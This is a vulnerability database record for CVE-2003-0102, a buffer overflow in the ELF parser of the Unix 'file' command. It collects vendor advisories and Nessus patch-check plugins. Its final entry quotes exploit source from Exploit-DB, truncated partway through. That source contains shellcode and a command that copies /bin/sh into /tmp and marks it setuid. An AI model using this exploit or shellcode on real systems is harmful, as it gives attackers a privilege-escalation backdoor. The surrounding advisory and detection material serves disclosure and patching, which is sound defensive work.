ID SUSE-SA:2003:017 Type suse Reporter Suse Modified 2003-03-21T12:40:17
Description
The file command can be used to determine the type of files. iDEFENSE published a security report about a buffer overflow in the handling-routines for the ELF file-format. In conjunction with other mechanisms like print-filters, cron-jobs, eMail-scanners (like AMaViS) and alike this vulnerability can be used to gain higher privileges or to compromise the system remotely.
{"enchantments": {"score": {"value": 6.0, "vector": "NONE", "modified": "2016-09-04T11:50:35"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2003-0102"]}, {"type": "osvdb", "idList": ["OSVDB:6456"]}, {"type": "redhat", "idList": ["RHSA-2003:087"]}, {"type": "nessus", "idList": ["MANDRAKE_MDKSA-2003-030.NASL", "REDHAT-RHSA-2003-087.NASL", "DEBIAN_DSA-260.NASL", "SUSE_SA_2003_017.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:22325", "EDB-ID:22324"]}, {"type": "openvas", "idList": ["OPENVAS:53591"]}, {"type": "debian", "idList": ["DEBIAN:DSA-260-1:4057C"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:4165"]}], "modified": "2016-09-04T11:50:35"}, "vulnersScore": 6.0}, "reporter": "Suse", "id": "SUSE-SA:2003:017", "modified": "2003-03-21T12:40:17", "published": "2003-03-21T12:40:17", "history": [], "bulletinFamily": "unix", "viewCount": 1, "cvelist": ["CVE-2003-0102"], "affectedPackage": [{"packageVersion": "3.37-206", "packageName": "file", "packageFilename": "file-3.37-206.i386.rpm", "operator": "lt", "OSVersion": "8.0", "OS": "openSUSE", "arch": "i386"}, {"packageVersion": "3.33-69", "packageName": "file", "packageFilename": "file-3.33-69.ppc.rpm", "operator": "lt", "OSVersion": "7.3", "OS": "openSUSE", "arch": "ppc"}, {"packageVersion": "3.32-118", "packageName": "file", "packageFilename": "file-3.32-118.i386.rpm", "operator": "lt", "OSVersion": "7.1", "OS": "openSUSE", "arch": "i386"}, {"packageVersion": "3.32-36", "packageName": "file", "packageFilename": "file-3.32-36.ppc.rpm", "operator": "lt", "OSVersion": "7.1", "OS": "openSUSE", "arch": "ppc"}, {"packageVersion": "3.37-206", "packageName": "file", "packageFilename": "file-3.37-206.i586.rpm", "operator": "lt", "OSVersion": "8.1", "OS": "openSUSE", "arch": "i586"}, {"packageVersion": "3.32-69", "packageName": "file", "packageFilename": "file-3.32-69.alpha.rpm", "operator": "lt", "OSVersion": "7.1", "OS": "openSUSE", "arch": "alpha"}, {"packageVersion": "3.33-39", "packageName": "file", "packageFilename": "file-3.33-39.sparc.rpm", "operator": "lt", "OSVersion": "7.3", "OS": "openSUSE", "arch": "sparc"}, {"packageVersion": "3.33-85", "packageName": "file", "packageFilename": "file-3.33-85.i386.rpm", "operator": "lt", "OSVersion": "7.3", "OS": "openSUSE", "arch": "i386"}], "type": "suse", "hash": "55ec6031be75e0f08fa2aa2514d0931ceff6e554934e31db6d729006017fe162", "references": [], "description": "The file command can be used to determine the type of files. iDEFENSE published a security report about a buffer overflow in the handling-routines for the ELF file-format. In conjunction with other mechanisms like print-filters, cron-jobs, eMail-scanners (like AMaViS) and alike this vulnerability can be used to gain higher privileges or to compromise the system remotely.", "title": "remote system compromise in file", "href": "http://lists.opensuse.org/opensuse-security-announce/2003-03/msg00018.html", "lastseen": "2016-09-04T11:50:35", "edition": 1, "objectVersion": "1.2", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}
{"cve": [{"lastseen": "2019-05-29T18:07:57", "bulletinFamily": "NVD", "description": "Buffer overflow in tryelf() in readelf.c of the file command allows attackers to execute arbitrary code as the user running file, possibly via a large entity size value in an ELF header (elfhdr.e_shentsize).", "modified": "2018-05-03T01:29:00", "id": "CVE-2003-0102", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0102", "published": "2003-03-18T05:00:00", "title": "CVE-2003-0102", "type": "cve", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:01", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\n[Vendor Specific Advisory URL](ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2003-003.txt.asc)\nRedHat RHSA: RHSA-2003:086\nMail List Post: http://marc.theaimsgroup.com/?l=bugtraq&m=104680706201721&w=2\n[CVE-2003-0102](https://vulners.com/cve/CVE-2003-0102)\n", "modified": "2003-03-04T00:00:00", "published": "2003-03-04T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:6456", "id": "OSVDB:6456", "type": "osvdb", "title": "file Command readelf.c tryelf() ELF Header Overflow", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "redhat": [{"lastseen": "2019-08-13T18:44:40", "bulletinFamily": "unix", "description": "The file command is used to identify a particular file according to\nthe type of data contained by the file.\n\nThe file utility before version 3.41 contains a buffer overflow\nvulnerability in the ELF parsing routines. This vulnerability may\nallow an attacker to create a carefully crafted binary which can cause\narbitrary code to run if a victim runs the file command against that\nbinary.\n\nOn some distributions it may also be possible to trigger this file command\nvulnerability by encouraging the victim to use the\nless command on an exploited file name so that it will be processed by the\nlesspipe.sh script.\n\nAll users are advised to update to these erratum packages which\ncontain a backported patch to correct this vulnerability.\n\nRed Hat would like to thank iDefense for disclosing this issue and\nzen-parse for discussion of some of the implications.", "modified": "2018-03-14T19:26:39", "published": "2003-03-05T05:00:00", "id": "RHSA-2003:087", "href": "https://access.redhat.com/errata/RHSA-2003:087", "type": "redhat", "title": "(RHSA-2003:087) file security update", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2019-11-01T03:20:08", "bulletinFamily": "scanner", "description": "Updated file packages are available to close a buffer overflow\nvulnerability.\n\n[Updated 12 March 2003] Added packages for Red Hat Enterprise Linux ES\nand Red Hat Enterprise Linux WS\n\nThe file command is used to identify a particular file according to\nthe type of data contained by the file.\n\nThe file utility before version 3.41 contains a buffer overflow\nvulnerability in the ELF parsing routines. This vulnerability may\nallow an attacker to create a carefully crafted binary which can cause\narbitrary code to run if a victim runs the file command against that\nbinary.\n\nOn some distributions it may also be possible to trigger this file\ncommand vulnerability by encouraging the victim to use the less\ncommand on an exploited file name so that it will be processed by the\nlesspipe.sh script.\n\nAll users are advised to update to these erratum packages which\ncontain a backported patch to correct this vulnerability.\n\nRed Hat would like to thank iDefense for disclosing this issue and\nzen-parse for discussion of some of the implications.", "modified": "2019-11-02T00:00:00", "id": "REDHAT-RHSA-2003-087.NASL", "href": "https://www.tenable.com/plugins/nessus/12376", "published": "2004-07-06T00:00:00", "title": "RHEL 2.1 : file (RHSA-2003:087)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2003:087. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(12376);\n script_version (\"1.24\");\n script_cvs_date(\"Date: 2019/10/25 13:36:10\");\n\n script_cve_id(\"CVE-2003-0102\");\n script_xref(name:\"RHSA\", value:\"2003:087\");\n\n script_name(english:\"RHEL 2.1 : file (RHSA-2003:087)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated file packages are available to close a buffer overflow\nvulnerability.\n\n[Updated 12 March 2003] Added packages for Red Hat Enterprise Linux ES\nand Red Hat Enterprise Linux WS\n\nThe file command is used to identify a particular file according to\nthe type of data contained by the file.\n\nThe file utility before version 3.41 contains a buffer overflow\nvulnerability in the ELF parsing routines. This vulnerability may\nallow an attacker to create a carefully crafted binary which can cause\narbitrary code to run if a victim runs the file command against that\nbinary.\n\nOn some distributions it may also be possible to trigger this file\ncommand vulnerability by encouraging the victim to use the less\ncommand on an exploited file name so that it will be processed by the\nlesspipe.sh script.\n\nAll users are advised to update to these erratum packages which\ncontain a backported patch to correct this vulnerability.\n\nRed Hat would like to thank iDefense for disclosing this issue and\nzen-parse for discussion of some of the implications.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2003-0102\"\n );\n # http://www.idefense.com/advisory/03.04.03.txt\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.accenture.com/us-en/service-idefense-security-intelligence\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2003:087\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected file package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:file\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:2.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2003/03/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/03/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^2\\.1([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 2.1\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i386\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2003:087\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"file-3.39-8.7x\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"file\");\n }\n}\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T02:54:55", "bulletinFamily": "scanner", "description": "A memory allocation problem in file was found by Jeff Johnson, and a\nstack overflow corruption problem was found by David Endler. These\nproblems have been corrected in file version 3.41 and likely affect\nall previous version. These problems pose a security threat as they\ncan be used to execute arbitrary code by an attacker under the\nprivileges of another user. Note that the attacker must first somehow\nconvince the target user to execute file against a specially crafted\nfile that triggers the buffer overflow in file.\n\nUpdate :\n\nThe 8.2 and 9.0 packages installed data in a different directory than\nwhere they should have been installed, which broke compatability with\na small number of programs. These updated packages place those files\nback in the appropriate location.", "modified": "2019-11-02T00:00:00", "id": "MANDRAKE_MDKSA-2003-030.NASL", "href": "https://www.tenable.com/plugins/nessus/14014", "published": "2004-07-31T00:00:00", "title": "Mandrake Linux Security Advisory : file (MDKSA-2003:030-1)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2003:030. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(14014);\n script_version (\"1.17\");\n script_cvs_date(\"Date: 2019/08/02 13:32:46\");\n\n script_cve_id(\"CVE-2003-0102\");\n script_xref(name:\"MDKSA\", value:\"2003:030-1\");\n\n script_name(english:\"Mandrake Linux Security Advisory : file (MDKSA-2003:030-1)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Mandrake Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A memory allocation problem in file was found by Jeff Johnson, and a\nstack overflow corruption problem was found by David Endler. These\nproblems have been corrected in file version 3.41 and likely affect\nall previous version. These problems pose a security threat as they\ncan be used to execute arbitrary code by an attacker under the\nprivileges of another user. Note that the attacker must first somehow\nconvince the target user to execute file against a specially crafted\nfile that triggers the buffer overflow in file.\n\nUpdate :\n\nThe 8.2 and 9.0 packages installed data in a different directory than\nwhere they should have been installed, which broke compatability with\na small number of programs. These updated packages place those files\nback in the appropriate location.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.idefense.com/advisory/03.04.03.txt\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected file package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:file\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:8.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/04/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK8.2\", cpu:\"i386\", reference:\"file-3.41-1.2mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK9.0\", cpu:\"i386\", reference:\"file-3.41-1.2mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T02:21:13", "bulletinFamily": "scanner", "description": "iDEFENSE discovered a buffer overflow vulnerability in the ELF format\nparsing of the ", "modified": "2019-11-02T00:00:00", "id": "DEBIAN_DSA-260.NASL", "href": "https://www.tenable.com/plugins/nessus/15097", "published": "2004-09-29T00:00:00", "title": "Debian DSA-260-1 : file - buffer overflow", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-260. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(15097);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/08/02 13:32:17\");\n\n script_cve_id(\"CVE-2003-0102\");\n script_xref(name:\"DSA\", value:\"260\");\n\n script_name(english:\"Debian DSA-260-1 : file - buffer overflow\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"iDEFENSE discovered a buffer overflow vulnerability in the ELF format\nparsing of the 'file' command, one which can be used to execute\narbitrary code with the privileges of the user running the command.\nThe vulnerability can be exploited by crafting a special ELF binary\nwhich is then input to file. This could be accomplished by leaving the\nbinary on the file system and waiting for someone to use file to\nidentify it, or by passing it to a service that uses file to classify\ninput. (For example, some printer filters run file to determine how to\nprocess input going to a printer.)\n\nFixed packages are available in version 3.28-1.potato.1 for Debian 2.2\n(potato) and version 3.37-3.1.woody.1 for Debian 3.0 (woody). We\nrecommend you upgrade your file package immediately.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2003/dsa-260\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected file package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:file\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:2.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/09/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"2.2\", prefix:\"file\", reference:\"3.28-1.potato.1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"file\", reference:\"3.37-3.1.woody.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-03T12:18:09", "bulletinFamily": "scanner", "description": "The remote host is missing the patch for the advisory SUSE-SA:2003:017 (file).\n\n\nThe file command can be used to determine the type of files.\niDEFENSE published a security report about a buffer overflow in the\nhandling-routines for the ELF file-format.\nIn conjunction with other mechanisms like print-filters, cron-jobs,\neMail-scanners (like AMaViS) and alike this vulnerability can be used\nto gain higher privileges or to compromise the system remotely.\n\nThere is no temporary fix known other then updating the system.\n\nPlease download the update package for your distribution and verify its\nintegrity by the methods listed in section 3) of this announcement.\nThen, install the package using the command ", "modified": "2019-11-02T00:00:00", "id": "SUSE_SA_2003_017.NASL", "href": "https://www.tenable.com/plugins/nessus/13787", "published": "2004-07-25T00:00:00", "title": "SUSE-SA:2003:017: file", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# This plugin text was extracted from SuSE Security Advisory SUSE-SA:2003:017\n#\n\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(13787);\n script_bugtraq_id(7008);\n script_bugtraq_id(7009);\n script_version (\"1.22\");\n \n name[\"english\"] = \"SUSE-SA:2003:017: file\";\n \n script_name(english:name[\"english\"]);\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a vendor-supplied security patch\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is missing the patch for the advisory SUSE-SA:2003:017 (file).\n\n\nThe file command can be used to determine the type of files.\niDEFENSE published a security report about a buffer overflow in the\nhandling-routines for the ELF file-format.\nIn conjunction with other mechanisms like print-filters, cron-jobs,\neMail-scanners (like AMaViS) and alike this vulnerability can be used\nto gain higher privileges or to compromise the system remotely.\n\nThere is no temporary fix known other then updating the system.\n\nPlease download the update package for your distribution and verify its\nintegrity by the methods listed in section 3) of this announcement.\nThen, install the package using the command 'rpm -Fhv file.rpm' to apply\nthe update.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"http://www.suse.de/security/2003_017_file.html\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2004/07/25\");\n script_cvs_date(\"Date: 2019/10/25 13:36:27\");\n script_end_attributes();\n\n \n summary[\"english\"] = \"Check for the version of the file package\";\n script_cve_id(\"CVE-2003-0102\", \"CVE-2003-1092\");\n script_summary(english:summary[\"english\"]);\n \n script_category(ACT_GATHER_INFO);\n \n script_copyright(english:\"This script is Copyright (C) 2004-2019 Tenable Network Security, Inc.\");\n family[\"english\"] = \"SuSE Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/SuSE/rpm-list\");\n exit(0);\n}\n\ninclude(\"rpm.inc\");\nif ( rpm_check( reference:\"file-3.32-118\", release:\"SUSE7.1\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"file-3.33-85\", release:\"SUSE7.3\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"file-3.37-206\", release:\"SUSE8.0\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"file-3.37-206\", release:\"SUSE8.1\") )\n{\n security_hole(0);\n exit(0);\n}\nif (rpm_exists(rpm:\"file-\", release:\"SUSE7.1\")\n || rpm_exists(rpm:\"file-\", release:\"SUSE7.3\")\n || rpm_exists(rpm:\"file-\", release:\"SUSE8.0\")\n || rpm_exists(rpm:\"file-\", release:\"SUSE8.1\") )\n{\n set_kb_item(name:\"CVE-2003-0102\", value:TRUE);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-02T18:29:18", "bulletinFamily": "exploit", "description": "File 3.x Local Stack Overflow Code Execution Vulnerability (2). CVE-2003-0102. Local exploit for unix platform", "modified": "2003-03-04T00:00:00", "published": "2003-03-04T00:00:00", "id": "EDB-ID:22325", "href": "https://www.exploit-db.com/exploits/22325/", "type": "exploitdb", "title": "File 3.x - Local Stack Overflow Code Execution Vulnerability 2", "sourceData": "source: http://www.securityfocus.com/bid/7008/info\r\n \r\nIt has been reported that a stack overflow exists in the file program. Although details of this issue are currently unavailable, it is likely that this issue could be exploited to execute code as the user invoking file. \r\n\r\n/*\r\n** file(1) exploit for *bsd,linux\r\n** does cp /bin/sh /tmp/.sh;chmod 4755 /tmp/.sh and also\r\n** echos the correct filename followed by \": data\"\r\n** this one actually works w/o silly targets or offsets\r\n** cmdshellcode by *://lsd-pl.net/\r\n** lem0nxx@hotmail.com\r\n*/\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <fcntl.h>\r\n#include <sys/types.h>\r\n#include <errno.h>\r\n/* elf stuff */\r\n#define EI_NIDENT 16\r\n#define ET_EXEC 2\r\n#define EM_VPP500 17/* Fujitsu VPP500! */\r\n#define EV_CURRENT 1\r\n#define FILESIZE 16384\r\ntypedef unsigned short int Elf32_Half;\r\ntypedef unsigned long int Elf32_Word;\r\ntypedef unsigned long int Elf32_Addr;\r\ntypedef unsigned long int Elf32_Off;\r\ntypedef struct\r\n{\r\n unsigned char e_ident[EI_NIDENT];\r\n Elf32_Half e_type;\r\n Elf32_Half e_machine;\r\n Elf32_Word e_version;\r\n Elf32_Addr e_entry;\r\n Elf32_Off e_phoff;\r\n Elf32_Off e_shoff;\r\n Elf32_Word e_flags;\r\n Elf32_Half e_ehsize;\r\n Elf32_Half e_phentsize;\r\n Elf32_Half e_phnum;\r\n Elf32_Half e_shentsize;\r\n Elf32_Half e_shnum;\r\n Elf32_Half e_shtrndx;\r\n}\r\nElf32_Ehdr;\r\nunsigned long\r\nget_sp (void)\r\n{\r\n __asm__ (\"movl %esp,%eax\");\r\n}\r\nunsigned char linux_code[] =\r\n \"\\xeb\\x22\\x59\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\"\r\n \"\\xe3\\x50\\x66\\x68\\x2d\\x63\\x89\\xe7\\x50\\x51\\x57\\x53\\x89\\xe1\\x99\\xb0\\x0b\"\r\n \"\\xcd\\x80\\xe8\\xd9\\xff\\xff\\xff\";\r\nunsigned char bsd_code[] =\r\n \"\\xeb\\x25\\x59\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\"\r\n \"\\xe3\\x50\\x66\\x68\\x2d\\x63\\x89\\xe7\\x50\\x51\\x57\\x53\\x89\\xe7\\x50\\x57\\x53\"\r\n \"\\x50\\xb0\\x3b\\xcd\\x80\\xe8\\xd6\\xff\\xff\\xff\";\r\nunsigned char cmd[] =\r\n \"echo %s: data;/bin/cp /bin/%s /tmp/.sh;chmod 4755 /tmp/.sh\";\r\nunsigned char *prepare_code (unsigned char *os_code, unsigned char *filename,\r\n unsigned char *shell, int *code_len);\r\nint\r\nmain (int argc, char *argv[])\r\n{\r\n unsigned char *final_code, *os_code, *shell, *attackbuff;\r\n int fd, ix, code_len;\r\n Elf32_Ehdr *ehdr;\r\n if (!(attackbuff = (char *) malloc (FILESIZE)))\r\n {\r\n fprintf (stderr, \"malloc error\\n\");\r\n exit (-1);\r\n }\r\n ehdr = (Elf32_Ehdr *) attackbuff;\r\n if (argc < 3)\r\n {\r\n fprintf (stderr, \"Usage: %s <filename> <bsd|linux>\\n\", argv[0]);\r\n exit (-1);\r\n }\r\n switch (argv[2][0])\r\n {\r\n case 'l':\r\n case 'L':\r\n os_code = linux_code;\r\n if (!(shell = strdup (\"ash\")))\r\n{\r\n fprintf (stderr, \"strdup error\\n\");\r\n exit (-1);\r\n}\r\n break;\r\n case 'b':\r\n case 'B':\r\n os_code = bsd_code;\r\n if (!(shell = strdup (\"tcsh\")))/* does tcsh drop privs tho? ah well */\r\n{\r\n fprintf (stderr, \"strdup error\\n\");\r\n exit (-1);\r\n}\r\n break;\r\n default:\r\n fprintf (stderr, \"Invalid target os\\n\");\r\n exit (-1);\r\n }\r\n fprintf (stderr,\r\n \"elfrape2, using cp /bin/%s /tmp/.sh;chmod 4755 /tmp/.sh shellcode\\n\",\r\n shell);\r\n final_code = prepare_code (os_code, argv[1], shell, &code_len);\r\n fprintf (stderr, \"Using %s shellcode, %d bytes for file %s\\n\",\r\n argv[2][0] == 'b' ? \"BSD\" : \"LINUX\", code_len, argv[1]);\r\n memset (attackbuff, 0x90, FILESIZE);\r\n memset (attackbuff, 0x0, sizeof (Elf32_Ehdr));\r\n memcpy (attackbuff + FILESIZE - code_len, final_code, 